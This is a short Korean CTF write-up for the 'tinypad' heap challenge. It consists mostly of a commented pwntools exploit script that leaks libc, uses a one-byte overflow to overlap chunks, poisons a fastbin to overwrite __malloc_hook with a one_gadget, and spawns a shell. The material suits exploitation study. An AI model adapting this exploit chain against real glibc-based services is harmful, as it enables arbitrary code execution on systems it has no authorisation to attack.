Tinypad
Feb 28, 2019

House of Einherjar 연습해본다고 잡았는데, 안썼다ㅋㅋ…

그냥 청크를 오버랩시켜서 fastbin의 fd를 __malloc_hook 바로 아래의 가짜 청크로 덮어쓰고, 거기에 one_gadget 주소를 써 넣으면 된다. einherjar는 다른 문제로 해봐야지..

from pwn import *


def allocate(size, data):
    """Menu option 'A': add a memo of `size` bytes filled from `data`.

    Every answer is sent as one line after the pad's `>>> ` prompt, through
    the module-level tube `p` (created in the `__main__` block). `data` is
    forwarded verbatim, so it may already contain packed pointers.
    """
    replies = ('A', str(size), data)
    for reply in replies:
        p.sendlineafter('>>> ', reply)

def delete(idx):
    """Menu option 'D': free the memo held in slot `idx`.

    Drives the module-level tube `p`; the index is sent as a decimal string.
    """
    for answer in ('D', str(idx)):
        p.sendlineafter('>>> ', answer)

def edit(idx, data):
    """Menu option 'E': overwrite slot `idx` with `data`, then confirm with 'Y'.

    Uses the module-level tube `p`. The pad asks for confirmation after the
    new content, so the final 'Y' is part of the protocol, not optional.
    """
    sequence = ['E', str(idx), data, 'Y']
    for item in sequence:
        p.sendlineafter('>>> ', item)

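if __name__ == '__main__':
    # Exploit driver for the `tinypad` binary. All payload literals are bytes
    # so the script runs under both Python 2 and Python 3 pwntools (the
    # original str literals made `'K'*0x18 + p64(...)` and
    # `.ljust(8, '\x00')` raise TypeError on Python 3).
    p = process('./tinypad')
    elf = ELF('./tinypad')
    # NOTE(review): `elf.libc` is the libc the *local* loader resolves, while
    # 0x3c4b78 and 0xf1147 below are fixed constants. Both only agree when
    # the local libc is the challenge libc (looks like glibc 2.23 / Ubuntu
    # 16.04 x86-64) — confirm before running elsewhere.
    libc = elf.libc

    # --- Stage 1: libc leak ------------------------------------------------
    # Two memos whose chunks are well above the fastbin range; after both are
    # freed the pad still prints slot 1's content, which now holds a libc
    # pointer (presumably the unsorted-bin head inside main_arena).
    allocate(0x100, b'A' * 8)  # 1
    allocate(0x100, b'B' * 8)  # 2
    delete(1)
    delete(2)

    p.recvuntil(b'#   INDEX: 1')
    p.recvuntil(b'# CONTENT: ')
    leak = u64(p.recv(6).ljust(8, b'\x00'))
    # 0x3c4b78: distance from the leaked pointer to the libc base for the
    # target libc. A wrong constant shows up as a non-page-aligned base, so
    # fail loudly here instead of corrupting the heap with a bad address.
    libcbase = leak - 0x3c4b78
    if libcbase & 0xfff:
        log.error('libc base 0x%x is not page aligned; leak offset does not match this libc' % libcbase)
    log.info('[LIBC] : 0x%x' % libcbase)

    # --- Stage 2: chunk overlap + fastbin poisoning -------------------------
    allocate(0x28, b'A' * 0x28)      # 1: 0x30 chunk, buffer completely filled
    allocate(0x18, b'B' * 8)         # 2: 0x20 chunk, right after 1
    allocate(0x68, p64(0x21) * 10)   # 3: 0x70 chunk, right after 2

    # Re-edit slot 1 with one byte more than its buffer: byte 0x28 lands on
    # the low byte of chunk 2's size field and turns 0x21 into 0x71, so chunk
    # 2 now claims to cover chunk 3 as well.
    edit(1, b'A' * 0x28 + b'\x71')

    delete(3)   # 0x70 fastbin: [3]
    delete(2)   # chunk 2 is now 0x70-sized too: [2 -> 3]
    # Take chunk 2 back and write through it into chunk 3's header: restore
    # chunk 3's size to 0x71 (malloc checks it when popping the bin) and aim
    # its fd at a fake chunk 0x23 below __malloc_hook, where a neighbouring
    # libc pointer presumably supplies a plausible 0x7f size byte.
    allocate(0x68, b'K' * 0x18 + p64(0x71) + p64(libcbase + libc.symbols['__malloc_hook'] - 0x23))

    allocate(0x68, b'A')   # pops chunk 3
    # Pops the fake chunk. Its user data starts at __malloc_hook - 0x13, so
    # 19 bytes of padding place the gadget address exactly on __malloc_hook.
    # 0xf1147 is presumably a one_gadget offset for the same libc — regenerate
    # with one_gadget if the libc differs.
    allocate(0x68, b'B' * 19 + p64(libcbase + 0xf1147))

    # Author's trigger: with __malloc_hook overwritten, the next malloc the
    # target performs jumps to the gadget. Which code path in the delete
    # handler reaches malloc is not visible here — confirm against the binary.
    delete(1)

    p.interactive()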


